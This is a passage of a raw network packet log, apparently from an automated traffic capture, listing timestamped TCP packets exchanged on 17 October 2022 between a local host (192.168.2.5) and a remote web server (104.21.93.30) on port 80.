                                                                                                                                  Oct 17, 2022 22:06:28.662064075 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662102938 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662142038 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662147045 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.662178993 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662218094 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662219048 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.662259102 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662287951 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662296057 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.662312031 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662334919 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662344933 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.662358999 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662384033 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662395954 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.662406921 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662430048 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662444115 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.662453890 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662484884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662499905 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.662509918 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662533998 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662547112 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.662556887 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662580013 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662595034 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.662605047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662635088 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.662645102 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.664890051 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.664930105 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.664971113 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.664999008 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.665021896 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.665025949 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.665045977 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.665075064 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.684586048 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.692198038 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692239046 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692260027 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692322969 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.692326069 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692344904 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692363024 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.692363024 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692380905 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692399979 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692418098 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692424059 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.692435980 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692456007 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692478895 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.692480087 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692503929 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692526102 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.692527056 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692548990 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.692549944 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692573071 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692594051 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.692600012 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692622900 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692642927 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.692651033 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692677975 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692698956 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.692707062 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692734957 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692747116 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.692756891 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692780018 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.692806959 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.694188118 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.694211960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.694230080 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.694247961 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.694266081 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.694281101 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.694283962 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.694338083 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.695343971 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695364952 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695384026 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695401907 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695419073 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695429087 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.695442915 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695453882 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.695461035 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695478916 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695483923 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.695497036 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695512056 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.695513964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695533991 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695558071 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.695559978 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695586920 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695595026 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.695611954 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695626974 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.695637941 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695662975 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695677042 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.695684910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.695734024 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.697196960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.697252035 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.697283983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.697304010 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.697329044 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.697354078 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.697384119 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.697396040 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.697412014 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.697422028 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.697437048 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.697463036 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.718369961 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718421936 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718449116 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718473911 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718497038 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718523026 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718547106 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718569994 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718605995 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718611956 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.718630075 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718656063 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718681097 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718704939 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718715906 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.718730927 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718759060 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718781948 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.718785048 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718811989 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718821049 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.718837976 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718866110 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718868017 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.718911886 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718940973 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718954086 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.718966961 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.718991995 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719000101 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.719017982 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719043970 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719057083 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.719069958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719096899 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.719096899 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719125986 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719152927 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719153881 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.719178915 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719192982 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.719203949 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719232082 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719248056 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.719258070 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719284058 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719309092 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719310045 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.719336987 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719348907 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.719362020 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719382048 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.719415903 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.722749949 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.723011017 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.724920034 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.724967003 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.724996090 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725024939 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725039005 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725053072 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725083113 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725084066 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725111008 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725136042 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725137949 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725155115 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725163937 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725193977 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725222111 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725222111 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725250006 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725272894 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725276947 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725301981 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725327015 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725328922 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725354910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725380898 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725388050 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725409031 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725425959 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725436926 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725464106 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725491047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725491047 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725524902 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725549936 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725552082 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725577116 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725589991 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725604057 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725632906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725650072 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725656986 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725681067 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725706100 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725708008 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725733995 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725755930 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725759029 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725786924 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725801945 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725812912 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725837946 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725858927 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725862026 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725888014 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725905895 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725914955 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725940943 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725965977 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.725966930 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.725991964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726016998 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.726018906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726044893 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726063013 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.726248980 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726294041 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726310968 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.726320028 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726346970 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726361036 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.726483107 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726548910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726557016 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.726577044 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726605892 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726625919 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.726632118 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726658106 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726680040 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.726685047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726711035 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726732016 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.726738930 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726763964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726779938 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.726790905 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726818085 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726833105 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.726844072 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726871014 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726923943 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.726929903 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726958036 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.726974010 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.726984024 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727009058 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727027893 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.727035999 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727061987 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727077961 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.727087021 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727123976 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.727438927 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727468014 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727502108 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727526903 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727544069 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.727554083 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727574110 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.727588892 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727615118 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727624893 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.727639914 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727667093 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727691889 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727693081 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.727715969 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727730989 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.727741003 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727765083 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727787018 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.727787971 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727814913 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727829933 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.727852106 CEST8049692104.21.93.30192.168.2.5
